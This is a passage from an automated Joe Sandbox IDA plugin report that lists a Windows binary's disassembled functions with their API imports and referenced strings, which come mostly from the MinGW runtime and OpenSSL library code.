Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004D1C30, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 283

APIs

Part of subcall function 004D1A90: fwrite.MSVCRT ref: 004D1ABB
Part of subcall function 004D1A90: vfprintf.MSVCRT ref: 004D1AD7
Part of subcall function 004D1A90: abort.MSVCRT ref: 004D1ADC

Part of subcall function 004D1AF0: VirtualQuery.KERNEL32 ref: 004D1B80
Part of subcall function 004D1AF0: VirtualProtect.KERNEL32 ref: 004D1BC2
Part of subcall function 004D1AF0: GetLastError.KERNEL32 ref: 004D1BE4

VirtualQuery.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004D1DCB
VirtualProtect.KERNEL32 ref: 004D1DFC
signal.MSVCRT ref: 004D1F38
signal.MSVCRT ref: 004D1F9F
signal.MSVCRT ref: 004D1FDF
signal.MSVCRT ref: 004D1FF8
signal.MSVCRT ref: 004D202A
signal.MSVCRT ref: 004D2060
signal.MSVCRT ref: 004D207F
signal.MSVCRT ref: 004D209F

Strings

VirtualQuery failed for %d bytes at address %p, xrefs: 004D1C0A, 004D1ED3
Unknown pseudo relocation bit size %d., xrefs: 004D1D2C
Unknown pseudo relocation protocol version %d., xrefs: 004D1EE7

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 0045E5D0, Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 226

APIs

strchr.MSVCRT ref: 0045E60A
memcmp.MSVCRT ref: 0045E668
strchr.MSVCRT ref: 0045E6A3
strchr.MSVCRT ref: 0045E6B5
_stricmp.MSVCRT(?,?,?,?,?,?,-00000001,?,00000000,00000004,0045E9D3), ref: 0045E748
strchr.MSVCRT ref: 0045E7B8
_strnicmp.MSVCRT ref: 0045E7FE
strncmp.MSVCRT ref: 0045E82B
_stricmp.MSVCRT ref: 0045E845
_stricmp.MSVCRT ref: 0045E87E
strchr.MSVCRT ref: 0045E89E
_strnicmp.MSVCRT ref: 0045E8D9

Strings

/, xrefs: 0045E893

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00431719, Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 277

APIs

Part of subcall function 004314A0: strlen.MSVCRT ref: 004314B1
Part of subcall function 004314A0: MultiByteToWideChar.KERNEL32 ref: 004314E6
Part of subcall function 004314A0: MultiByteToWideChar.KERNEL32 ref: 00431530
Part of subcall function 004314A0: strlen.MSVCRT ref: 0043154C
Part of subcall function 004314A0: MultiByteToWideChar.KERNEL32 ref: 0043157A
Part of subcall function 004314A0: _wfopen.MSVCRT ref: 0043158D
Part of subcall function 004314A0: _errno.MSVCRT ref: 0043159D
Part of subcall function 004314A0: _errno.MSVCRT ref: 004315A4
Part of subcall function 004314A0: fopen.MSVCRT ref: 004315B5
Part of subcall function 004314A0: fopen.MSVCRT ref: 004315F3
Part of subcall function 004314A0: MultiByteToWideChar.KERNEL32 ref: 00431627

GetLastError.KERNEL32 ref: 004319B0
ftell.MSVCRT ref: 00431A74
fflush.MSVCRT ref: 00431A80
feof.MSVCRT ref: 00431A90
fseek.MSVCRT ref: 00431AAB
_fileno.MSVCRT ref: 00431B27
_setmode.MSVCRT ref: 00431B3F

Part of subcall function 00430510: strlen.MSVCRT ref: 00430554

Part of subcall function 004316A0: fclose.MSVCRT ref: 004316E2

_setmode.MSVCRT ref: 00431BAB

Strings

',', xrefs: 004319EE
e, xrefs: 00431BF1
fopen(', xrefs: 004319F6
t, xrefs: 00431BF9

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00414990, Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 217

APIs

strlen.MSVCRT ref: 004149EE
memcpy.MSVCRT ref: 00414A7D

Part of subcall function 00413470: memcmp.MSVCRT ref: 0041348A

Part of subcall function 00430510: strlen.MSVCRT ref: 00430554

memset.MSVCRT ref: 00414AE9
strlen.MSVCRT ref: 00414B6C
localtime.MSVCRT ref: 00414BFA
strlen.MSVCRT ref: 00414C9F

Strings

[%02d:%02d:%02d] , xrefs: 00414C0F
thread=%lu, file=%s, line=%d, info=", xrefs: 00414B13
%5lu file=%s, line=%d, , xrefs: 004149D6
number=%d, address=%08lX, xrefs: 00414A0E
>, xrefs: 00414ADA
thread=%lu, , xrefs: 00414C86

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00462159, Relevance: 21.2, APIs: 4, Strings: 8, Instructions: 216

APIs

Part of subcall function 00456CB0: strlen.MSVCRT ref: 00456CC1
Part of subcall function 00456CB0: strncmp.MSVCRT ref: 00456CD3

strspn.MSVCRT ref: 0046219F
strspn.MSVCRT ref: 004621C3
strspn.MSVCRT ref: 004621DD

Part of subcall function 00430450: strlen.MSVCRT ref: 0043045F

strspn.MSVCRT ref: 004622F9

Strings

,name:, xrefs: 004623AF
0123456789, xrefs: 004621CA, 004622EE
A, xrefs: 00462540
section:, xrefs: 004623BF
inherit, xrefs: 004622DE
,value:, xrefs: 004623A0
v3_asid.c, xrefs: 00462379, 00462438, 00462473, 00462490, 004624C3, 004624EA, 0046251B, 00462538
RDI, xrefs: 00462330

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00435CD0, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 128

APIs

Part of subcall function 004350D0: LoadLibraryA.KERNEL32 ref: 00435102
Part of subcall function 004350D0: LoadLibraryA.KERNEL32 ref: 00435110
Part of subcall function 004350D0: FreeLibrary.KERNEL32 ref: 004351CC
Part of subcall function 004350D0: GetProcAddress.KERNEL32 ref: 004351F6
Part of subcall function 004350D0: GetProcAddress.KERNEL32 ref: 00435208
Part of subcall function 004350D0: GetProcAddress.KERNEL32 ref: 0043521C
Part of subcall function 004350D0: FreeLibrary.KERNEL32 ref: 004352AC
Part of subcall function 004350D0: GetVersion.KERNEL32 ref: 004352BB
Part of subcall function 004350D0: GetProcAddress.KERNEL32 ref: 004352EF
Part of subcall function 004350D0: GetProcAddress.KERNEL32 ref: 00435301
Part of subcall function 004350D0: GetProcAddress.KERNEL32 ref: 00435315
Part of subcall function 004350D0: GetProcAddress.KERNEL32 ref: 00435329
Part of subcall function 004350D0: GetProcAddress.KERNEL32 ref: 0043533D
Part of subcall function 004350D0: GetProcAddress.KERNEL32 ref: 00435351
Part of subcall function 004350D0: GetProcAddress.KERNEL32 ref: 00435365
Part of subcall function 004350D0: GetProcAddress.KERNEL32 ref: 00435379
Part of subcall function 004350D0: GetProcAddress.KERNEL32 ref: 0043538D
Part of subcall function 004350D0: GetProcAddress.KERNEL32 ref: 004353A1
Part of subcall function 004350D0: GetProcAddress.KERNEL32 ref: 004353B5
Part of subcall function 004350D0: GetProcAddress.KERNEL32 ref: 004353C9
Part of subcall function 004350D0: GetTickCount.KERNEL32 ref: 00435583
Part of subcall function 004350D0: FreeLibrary.KERNEL32 ref: 00435653
Part of subcall function 004350D0: GlobalMemoryStatus.KERNEL32 ref: 0043566B
Part of subcall function 004350D0: GetCurrentProcessId.KERNEL32 ref: 00435695
Part of subcall function 004350D0: GetProcAddress.KERNEL32 ref: 004356F9
Part of subcall function 004350D0: GetProcAddress.KERNEL32 ref: 0043570D
Part of subcall function 004350D0: GetProcAddress.KERNEL32 ref: 00435721
Part of subcall function 004350D0: GetVersion.KERNEL32 ref: 0043575E
Part of subcall function 004350D0: GetVersion.KERNEL32 ref: 00435764
Part of subcall function 004350D0: FreeLibrary.KERNEL32 ref: 004357BF
Part of subcall function 004350D0: GetTickCount.KERNEL32 ref: 00435965
Part of subcall function 004350D0: GetTickCount.KERNEL32 ref: 004359BE
Part of subcall function 004350D0: GetTickCount.KERNEL32 ref: 00435B2C
Part of subcall function 004350D0: CloseHandle.KERNEL32 ref: 00435BA6

GetVersion.KERNEL32 ref: 00435CDF
GetDC.USER32 ref: 00435D07
GetDeviceCaps.GDI32 ref: 00435D23
GetDeviceCaps.GDI32 ref: 00435D35
CreateCompatibleBitmap.GDI32 ref: 00435D4B
GetObjectA.GDI32 ref: 00435D6D
GetDIBits.GDI32 ref: 00435E63
DeleteObject.GDI32 ref: 00435EC8
ReleaseDC.USER32 ref: 00435EDC

Part of subcall function 00413610: GetModuleHandleA.KERNEL32 ref: 00413638
Part of subcall function 00413610: GetProcAddress.KERNEL32 ref: 00413654
Part of subcall function 00413610: GetProcessWindowStation.USER32 ref: 00413670
Part of subcall function 00413610: GetUserObjectInformationW.USER32 ref: 004136A8
Part of subcall function 00413610: GetLastError.KERNEL32 ref: 004136B5
Part of subcall function 00413610: GetUserObjectInformationW.USER32 ref: 0041370D
Part of subcall function 00413610: wcsstr.MSVCRT ref: 00413736

Strings

(, xrefs: 00435D93
rand_win.c, xrefs: 00435D8B

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004D1A90, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 120

APIs

fwrite.MSVCRT ref: 004D1ABB
vfprintf.MSVCRT ref: 004D1AD7
abort.MSVCRT ref: 004D1ADC

Part of subcall function 004D1AF0: VirtualQuery.KERNEL32 ref: 004D1B80
Part of subcall function 004D1AF0: VirtualProtect.KERNEL32 ref: 004D1BC2
Part of subcall function 004D1AF0: GetLastError.KERNEL32 ref: 004D1BE4

VirtualQuery.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004D1DCB
VirtualProtect.KERNEL32 ref: 004D1DFC
signal.MSVCRT ref: 004D1F38
signal.MSVCRT ref: 004D1F9F
signal.MSVCRT ref: 004D1FDF
signal.MSVCRT ref: 004D1FF8
signal.MSVCRT ref: 004D202A
signal.MSVCRT ref: 004D2060
signal.MSVCRT ref: 004D207F
signal.MSVCRT ref: 004D209F

Strings

VirtualProtect failed with code 0x%x, xrefs: 004D1BEA
Mingw-w64 runtime failure:, xrefs: 004D1AAD
@, xrefs: 004D1BAB
VirtualQuery failed for %d bytes at address %p, xrefs: 004D1C0A
Address %p has no image-section, xrefs: 004D1C1E

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004483C0, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 88

APIs

strlen.MSVCRT ref: 004483DE
memcpy.MSVCRT ref: 004483F7
memset.MSVCRT ref: 0044848C
strlen.MSVCRT ref: 004484A3
fprintf.MSVCRT ref: 004484CE

Strings

Enter PEM pass phrase:, xrefs: 00448419
pem_lib.c, xrefs: 00448459
t, xrefs: 00448451
d, xrefs: 00448469
m, xrefs: 00448461
phrase is too short, needs to be at least %d chars, xrefs: 004484C0

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004E32D0, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 84

APIs

TlsGetValue.KERNEL32 ref: 004E32ED

Part of subcall function 004E3100: calloc.MSVCRT ref: 004E3173
Part of subcall function 004E3100: free.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,00000004,004E3B61), ref: 004E31A3

GetCurrentThreadId.KERNEL32 ref: 004E332B
CreateEventA.KERNEL32(?,?,?,?,?,?,?,00000000,00000004,004E3B61), ref: 004E3353

Part of subcall function 004E31B0: GetCurrentThreadId.KERNEL32 ref: 004E31F6
Part of subcall function 004E31B0: _ultoa.MSVCRT ref: 004E320F
Part of subcall function 004E31B0: OutputDebugStringA.KERNEL32 ref: 004E3243
Part of subcall function 004E31B0: abort.MSVCRT(00000000), ref: 004E324A

GetCurrentProcess.KERNEL32 ref: 004E3382
GetCurrentThread.KERNEL32 ref: 004E3386
GetCurrentProcess.KERNEL32 ref: 004E338E
DuplicateHandle.KERNEL32 ref: 004E33BA
GetThreadPriority.KERNEL32 ref: 004E33CD
TlsSetValue.KERNEL32 ref: 004E33F9
abort.MSVCRT ref: 004E340D

Part of subcall function 004E3250: fprintf.MSVCRT ref: 004E3299

Strings

`5N, xrefs: 004E3317

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004E1340, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 83

APIs

calloc.MSVCRT ref: 004E1357
CreateSemaphoreA.KERNEL32 ref: 004E13AD
CreateSemaphoreA.KERNEL32 ref: 004E13D4
InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,004E14C7,?,?,?,00000000), ref: 004E13F3
InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,004E14C7,?,?,?), ref: 004E13FE
InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,004E14C7), ref: 004E1409
CloseHandle.KERNEL32 ref: 004E1433
CloseHandle.KERNEL32 ref: 004E1446
free.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?,004E14C7,?,?,?,00000000), ref: 004E1452

Strings

l, xrefs: 004E1348

Memory Dump Source

Source File: 00000005.00000002.557401570.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.557391743.00400000.00000002.sdmp
Associated: 00000005.00000002.557446489.00578000.00000004.sdmp
Associated: 00000005.00000002.557455791.0057B000.00000002.sdmp
Associated: 00000005.00000002.557480064.0061B000.00000004.sdmp
Associated: 00000005.00000002.557493260.00620000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sync.jbxd

Function 004496B0, Relevance: 16.9, APIs: 5, Strings: 6, Instructions: 426

APIs

strlen.MSVCRT ref: 00449771

Part of subcall function 004300C0: memset.MSVCRT ref: 0043013E

memcpy.MSVCRT ref: 0044982E
memcpy.MSVCRT ref: 00449912

Part of subcall function 004301C0: memset.MSVCRT ref: 00430254
Part of subcall function 004301C0: memset.MSVCRT ref: 0043027A

strlen.MSVCRT ref: 00449B46
strncmp.MSVCRT ref: 00449B6B

Strings

d, xrefs: 00449D7A
pem_lib.c, xrefs: 004497B9, 00449957, 0044999D, 00449CAD, 00449D72
-----, xrefs: 00449769, 00449B81
-----END , xrefs: 004498EF, 00449A41, 00449B26, 00449D09
m, xrefs: 00449D82
-----BEGIN , xrefs: 00449752

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004314A0, Relevance: 16.6, APIs: 11, Instructions: 118

APIs

strlen.MSVCRT ref: 004314B1
MultiByteToWideChar.KERNEL32 ref: 004314E6
MultiByteToWideChar.KERNEL32 ref: 00431530
strlen.MSVCRT ref: 0043154C
MultiByteToWideChar.KERNEL32 ref: 0043157A
_wfopen.MSVCRT ref: 0043158D
_errno.MSVCRT ref: 0043159D
_errno.MSVCRT ref: 004315A4
fopen.MSVCRT ref: 004315B5
fopen.MSVCRT ref: 004315F3
MultiByteToWideChar.KERNEL32 ref: 00431627

Memory Dump Source

Source File: 00000005.00000002.557401570.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.557391743.00400000.00000002.sdmp
Associated: 00000005.00000002.557446489.00578000.00000004.sdmp
Associated: 00000005.00000002.557455791.0057B000.00000002.sdmp
Associated: 00000005.00000002.557480064.0061B000.00000004.sdmp
Associated: 00000005.00000002.557493260.00620000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sync.jbxd

Function 00413610, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 95

APIs

GetModuleHandleA.KERNEL32 ref: 00413638
GetProcAddress.KERNEL32 ref: 00413654
GetProcessWindowStation.USER32 ref: 00413670
GetUserObjectInformationW.USER32 ref: 004136A8
GetLastError.KERNEL32 ref: 004136B5
GetUserObjectInformationW.USER32 ref: 0041370D
wcsstr.MSVCRT ref: 00413736

Strings

_OPENSSL_isservice, xrefs: 00413649
Service-0x, xrefs: 00413728

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004130C0, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 89

APIs

getenv.MSVCRT ref: 004130D7
sscanf.MSVCRT ref: 00413109
strchr.MSVCRT ref: 0041313E
strtoul.MSVCRT ref: 0041316A
strtoul.MSVCRT ref: 004131C5

Strings

%I64i, xrefs: 004130E9
OPENSSL_ia32cap, xrefs: 004130D0
:, xrefs: 00413120
:, xrefs: 00413129

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00401500, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 64

APIs

GetModuleHandleA.KERNEL32 ref: 00401516
LoadLibraryA.KERNEL32 ref: 0040152C
GetModuleHandleA.KERNEL32 ref: 00401592
GetProcAddress.KERNEL32 ref: 004015AB

Strings

libgcj-16.dll, xrefs: 0040158B
__register_frame_info, xrefs: 00401540
libgcc_s_dw2-1.dll, xrefs: 0040150F, 00401525
__deregister_frame_info, xrefs: 00401558
_Jv_RegisterClasses, xrefs: 004015A0

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004660F0, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 97

APIs

strchr.MSVCRT ref: 0046611B
isspace.MSVCRT ref: 00466183
strchr.MSVCRT ref: 0046619E
isspace.MSVCRT ref: 004661DA
strlen.MSVCRT ref: 004661F3

Strings

s, xrefs: 0046621E
w, xrefs: 00466226
conf_mod.c, xrefs: 00466216

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00439132, Relevance: 13.7, APIs: 3, Strings: 6, Instructions: 218

APIs

strlen.MSVCRT ref: 0043935A
memcpy.MSVCRT ref: 004393EA
memcpy.MSVCRT ref: 00439445

Part of subcall function 00407A50: memcpy.MSVCRT ref: 00407CBE
Part of subcall function 00407A50: memcpy.MSVCRT ref: 00407CD9
Part of subcall function 00407A50: memcpy.MSVCRT ref: 00407DED

Part of subcall function 00413910: raise.MSVCRT ref: 0041393E
Part of subcall function 00413910: _exit.MSVCRT ref: 0041394A

Strings

r, xrefs: 00439390
p5_crpt.c, xrefs: 0043916E, 00439388, 004394D8, 004394F9
EVP_CIPHER_iv_length(cipher) <= 16, xrefs: 004394C8
@, xrefs: 00439497
c, xrefs: 00439380
EVP_CIPHER_key_length(cipher) <= (int)sizeof(md_tmp), xrefs: 004394E9

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00550EF0, Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 215

APIs

memmove.MSVCRT ref: 00550F73
memcpy.MSVCRT ref: 00550FA0
memmove.MSVCRT ref: 00550FF0
memmove.MSVCRT ref: 00551026
memmove.MSVCRT ref: 00551062

Part of subcall function 00553280: memcpy.MSVCRT ref: 005532E9
Part of subcall function 00553280: memcpy.MSVCRT ref: 00553320
Part of subcall function 00553280: memcpy.MSVCRT ref: 00553347

memcpy.MSVCRT ref: 005510C6
memcpy.MSVCRT ref: 00551129
memmove.MSVCRT ref: 005511A5

Strings

basic_string::_M_replace, xrefs: 005511BA

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00416CD0, Relevance: 13.6, APIs: 5, Strings: 4, Instructions: 142

APIs

memcpy.MSVCRT ref: 00416D3E
strlen.MSVCRT ref: 00416D6D
memcpy.MSVCRT ref: 00416DA9
strlen.MSVCRT ref: 00416DC2
memcpy.MSVCRT ref: 00416DFD

Strings

e, xrefs: 00416F07
obj_lib.c, xrefs: 00416D0C, 00416D7D, 00416DD2, 00416E38, 00416E98, 00416EC6, 00416EF7
s, xrefs: 00416EEF
A, xrefs: 00416EFF

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00456A70, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 139

APIs

strlen.MSVCRT ref: 00456A86
isupper.MSVCRT ref: 00456AF2
tolower.MSVCRT ref: 00456AFF
isupper.MSVCRT ref: 00456B0F

Strings

A, xrefs: 00456C85
q, xrefs: 00456C8D
v3_utl.c, xrefs: 00456A95, 00456BA8, 00456C04, 00456C44, 00456C7D

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00431E00, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69

APIs

Part of subcall function 004314A0: strlen.MSVCRT ref: 004314B1
Part of subcall function 004314A0: MultiByteToWideChar.KERNEL32 ref: 004314E6
Part of subcall function 004314A0: MultiByteToWideChar.KERNEL32 ref: 00431530
Part of subcall function 004314A0: strlen.MSVCRT ref: 0043154C
Part of subcall function 004314A0: MultiByteToWideChar.KERNEL32 ref: 0043157A
Part of subcall function 004314A0: _wfopen.MSVCRT ref: 0043158D
Part of subcall function 004314A0: _errno.MSVCRT ref: 0043159D
Part of subcall function 004314A0: _errno.MSVCRT ref: 004315A4
Part of subcall function 004314A0: fopen.MSVCRT ref: 004315B5
Part of subcall function 004314A0: fopen.MSVCRT ref: 004315F3
Part of subcall function 004314A0: MultiByteToWideChar.KERNEL32 ref: 00431627

GetLastError.KERNEL32 ref: 00431E62
_errno.MSVCRT ref: 00431ECA
_errno.MSVCRT ref: 00431ED1
fclose.MSVCRT ref: 00431F46

Strings

m, xrefs: 00431F2A
',', xrefs: 00431E9C
fopen(', xrefs: 00431EA4

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004BB080, Relevance: 12.3, APIs: 1, Strings: 7, Instructions: 307

APIs

strlen.MSVCRT ref: 004BB32E

Part of subcall function 0040C4B0: memcpy.MSVCRT ref: 0040C519
Part of subcall function 0040C4B0: strlen.MSVCRT ref: 0040C567

Strings

